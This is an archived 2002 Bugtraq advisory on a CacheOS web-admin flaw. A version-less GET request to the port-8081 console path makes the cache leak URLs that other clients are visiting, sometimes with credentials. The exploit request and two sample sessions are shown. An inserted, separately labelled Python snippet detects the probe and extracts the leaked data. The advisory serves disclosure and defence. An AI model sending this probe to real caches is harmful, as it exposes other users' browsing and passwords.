Bugtraq mailing list archives

svindel.net security advisory - web admin vulnerability in CacheOS


From: "Bjorn Djupvik" <bugtraq () svindel net>
Date: Tue, 8 Jan 2002 23:14:59 +0100

-----------------------------------------------------------------------------------------------

SECURITY ADVISORY

No:  001 (yay, our first!)
Credits: svindel.net research team
Date published: 01/08/2002
First discovered: 10/31/2001
Title: Cacheflow CacheOS[tm] web admin vulnerability
-----------------------------------------------------------------------------------------------
Description:
CacheOS is the software that runs on the web caching appliances made by Cacheflow
(www.cacheflow.com); the appliance is basically an Intel-based box with a RAID array and a
custom OS.
The CacheFlow has a web admin interface open on port 8081 by default.
By sending a certain request, malicious hosts can view parts of web pages
and URLs passing through the cache at that moment. Examples of
data that may be gathered using this method are usernames/passwords, form
contents, URLs, etc.

This exploit was tested on various CacheOS v3.1.* boxes and all were
vulnerable; we did not test on 4.* versions.

Exploit:

Use telnet or nc to connect to port 8081, then issue the following request:

GET /Secure/Local/console/cmhome.htm

Strictly speaking, HTTP requires a version string such as HTTP/1.0 at the
end of that request line. If you supply it, the cache replies that your station
is not authorized to view the page. If you omit HTTP/1.0, as I did above, most
of the time the cache just issues this:

-----------------------------------------------------------------------------------------------
Example exploit session:

localhost:~# telnet cacheflow 8081
Trying xxx.xxx.xxx.xxx...
Connected to cacheflow.
Escape character is '^]'.
GET /Secure/Local/console/cmhome.htm

HTTP/1.0 200 OK

Request cannot be honored
Connection closed by foreign host
-----------------------------------------------------------------------------------------------


If you try this several times, however, it will sometimes return something like this:


-----------------------------------------------------------------------------------------------


localhost:~# telnet cacheflow 8081
Trying xxx.xxx.xxx.xxx...
Connected to cacheflow.
Escape character is '^]'.
GET /Secure/Local/console/cmhome.htm

HTTP/1.0 404-Not Found

<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL "/Secure/Local/console/cmhome.htm

Easp&o=0&sv=za5cb0d78&qid=E2BCA8F417ECE94DBDD27B75F951FFDA&uid=2c234acbec234acbe&sid=3c234acbec234acbe&ord=1" was not found on this server.<P></BODY>Connection closed by foreign host.
-----------------------------------------------------------------------------------------------


As you can see, the chunk of data it blurted out in the 404 page contained
part of a URL that a client on the cache was visiting at the time.
We have also been able to read passwords from URLs using this technique.
There are probably more ways to exploit this and greater holes to be found,
but we didn't find any.. feel free to poke around :)
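A defender-side check for this behaviour, added here as an example and not part of the advisory: it flags version-less (HTTP/0.9-style) request lines aimed at the admin console path, the pattern used in the sessions above, and compares the URL echoed by a 404 page against the URL actually requested so that appended foreign data (another client's URL) is caught. The path prefix is the one from the advisory; the sample request lines and the 404 body are constructed.

```python
import re
from typing import List, Optional

# Admin console path from the advisory; the interface listens on 8081 by default.
ADMIN_PREFIX = "/Secure/Local/console/"

def parse_request_line(line: str) -> Optional[dict]:
    """Split a request line into method, target and version.
    Two tokens with no version is an HTTP/0.9 'simple request', the form the
    advisory sends; 'METHOD target HTTP/x.y' is a normal request."""
    parts = line.strip().split()
    if len(parts) == 2:
        return {"method": parts[0], "target": parts[1], "version": None}
    if len(parts) == 3 and parts[2].upper().startswith("HTTP/"):
        return {"method": parts[0], "target": parts[1], "version": parts[2]}
    return None  # not a request line we understand

def is_admin_probe(line: str) -> bool:
    """True for a version-less request aimed at the admin console path."""
    req = parse_request_line(line)
    return bool(req and req["version"] is None
                and req["target"].startswith(ADMIN_PREFIX))

def scan_request_lines(lines: List[str]) -> List[str]:
    """Return the request lines matching the advisory's probe pattern."""
    return [line for line in lines if is_admin_probe(line)]

# The CacheOS 404 page echoes the requested URL inside double quotes.
ECHO_RE = re.compile(r'requested URL "(?P<url>.*?)" was not found', re.S)

def leaked_bytes(request_target: str, body_404: str) -> str:
    """Return whatever the 404 page echoed beyond the URL actually requested;
    non-empty means the cache appended foreign data (another client's URL)."""
    m = ECHO_RE.search(body_404)
    if m is None:
        return ""
    echoed = m.group("url")
    if echoed.startswith(request_target):
        return echoed[len(request_target):].strip()
    return echoed.strip()  # echoed something unrelated: treat it all as leak

# Constructed samples, not captures from the advisory.
SAMPLE_REQUEST_LINES = [
    "GET /Secure/Local/console/cmhome.htm HTTP/1.0",  # normal: 'not authorized'
    "GET /Secure/Local/console/cmhome.htm",           # version-less probe
    "GET /index.html",                                # version-less, not admin path
]
SAMPLE_BODY_404 = (
    '<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>'
    'The requested URL "/Secure/Local/console/cmhome.htm\n\n'
    'search?q=test&sid=0123456789abcdef" was not found on this server.<P></BODY>'
)
```

Feed captured request lines to scan_request_lines() and 404 bodies to leaked_bytes(); a non-empty leak result on a box you administer means the bug is still present.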

Vendor status:  support () cacheflow com were contacted on 10/31/2001 and we
got a quick reply asking us for more information; however, no information about
patches or fixes was supplied to us, so we don't know whether this is fixed in
the latest versions of CacheOS or not. Since such a long time has passed, we
are now releasing this advisory.

-----------------------------------------------------------------------------------------------

[c] 2002 svindelegget

